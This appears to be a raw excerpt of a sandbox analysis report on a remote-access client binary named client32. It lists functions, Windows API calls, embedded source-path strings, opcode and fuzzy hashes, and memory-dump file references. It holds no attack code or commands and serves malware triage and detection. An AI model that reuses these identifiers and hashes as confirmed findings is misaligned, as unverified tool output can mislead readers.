                                                                                                                                                                                • API ID: Object$Select$Delete_free$CreateErrorFlushLastMetricsModePaletteParentRectSectionStretchSystemWindowZoomed_memmove
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$idata->dcaf_buf$idata->dcaf_datalen + datalen <= idata->dcaf_buflen$seq == ++(idata->dcaf_seq)
                                                                                                                                                                                • API String ID: 3629666175-2117459032
                                                                                                                                                                                • Opcode ID: faa7183c9b9be57656ec0bc9aa3cd8f2a4ed61a732f0ab0090683321723f3b21
                                                                                                                                                                                • Instruction ID: 5455deb223179d8475a85570d2e5c7b4f0b65bab9b1842e8e2bf744840464a8c
                                                                                                                                                                                • Opcode Fuzzy Hash: faa7183c9b9be57656ec0bc9aa3cd8f2a4ed61a732f0ab0090683321723f3b21
                                                                                                                                                                                • Instruction Fuzzy Hash: 1231E9BAE447026BD210CF74EC51BABF7E8AF4060CF194429E99E96241E731B500C755
                                                                                                                                                                                Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                                                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                                                • API String ID: 1318148156-3179819359
                                                                                                                                                                                • Opcode ID: 670d8dde9a5b63c1a5685221dc9e7bd6a8ad00241bd810f153019c5907e4002a
                                                                                                                                                                                • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 670d8dde9a5b63c1a5685221dc9e7bd6a8ad00241bd810f153019c5907e4002a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                                                                                                                Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memmove.LIBCMT ref: 11081859
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                                • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                                                                                                                • API String ID: 1528188558-3417006389
                                                                                                                                                                                • Opcode ID: ab4bfe0096dd1c6e984ab07e4770c1a14154fdf03299e30e8c6728c545b06781
                                                                                                                                                                                • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                                                                                                                • Opcode Fuzzy Hash: ab4bfe0096dd1c6e984ab07e4770c1a14154fdf03299e30e8c6728c545b06781
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                                                                                                                Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                                                                                                                • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 1103F7E1
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 3726914545-2830328467
                                                                                                                                                                                • Opcode ID: d185eca5ec86450cd170f46bf814076875c300843ce24596021866b7e3b318f8
                                                                                                                                                                                • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                                                                                                                • Opcode Fuzzy Hash: d185eca5ec86450cd170f46bf814076875c300843ce24596021866b7e3b318f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                                                                                                                Function 11145120 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 111451AA
                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                                                                                                                • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Item$Count$CreateInfoInsertPopup
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 756051400-4108050209
                                                                                                                                                                                • Opcode ID: c708d74ee42479b28c0d7182eb88a4704e8a34196df3389ec251a60e89b81d0c
                                                                                                                                                                                • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                                                                                • Opcode Fuzzy Hash: c708d74ee42479b28c0d7182eb88a4704e8a34196df3389ec251a60e89b81d0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                                                                                                Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1103F466
                                                                                                                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1103F484
                                                                                                                                                                                • Sleep.KERNEL32(00000014,?,110505AF,00000001,00000064), ref: 1103F497
                                                                                                                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Find$Sleep
                                                                                                                                                                                • String ID: PCIVideoSlave32
                                                                                                                                                                                • API String ID: 2137649973-2496367574
                                                                                                                                                                                • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                                                                                                • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                                                                                                                • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                                                                                                                Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                                • Opcode ID: e395e8c3f76aa82e29c5c487c5e1a2c8ae2ad8ef5375f28b19dd245856d26f79
                                                                                                                                                                                • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                                                                                                • Opcode Fuzzy Hash: e395e8c3f76aa82e29c5c487c5e1a2c8ae2ad8ef5375f28b19dd245856d26f79
                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                                                                                                Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                • API String ID: 4241058051-934300333
                                                                                                                                                                                • Opcode ID: d2a313a98d865355ae34c348828a9b0734b6429b783bb25cc7a391eb13289d51
                                                                                                                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                                                                                                • Opcode Fuzzy Hash: d2a313a98d865355ae34c348828a9b0734b6429b783bb25cc7a391eb13289d51
                                                                                                                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                                                                                                Function 11051360 Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 167COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle__wcstoi64
                                                                                                                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                                                                                                • API String ID: 1764780496-311296318
                                                                                                                                                                                • Opcode ID: 8c2f824c9c63e73e0dc65d68649f74f6b0f690330b7365ecb9b9d46d571b9dd1
                                                                                                                                                                                • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2f824c9c63e73e0dc65d68649f74f6b0f690330b7365ecb9b9d46d571b9dd1
                                                                                                                                                                                • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                                                                                                                Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                                                                                                                • _strncat.LIBCMT ref: 1102577B
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                                                                                                                • SetFocus.USER32(?), ref: 11025855
                                                                                                                                                                                  • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
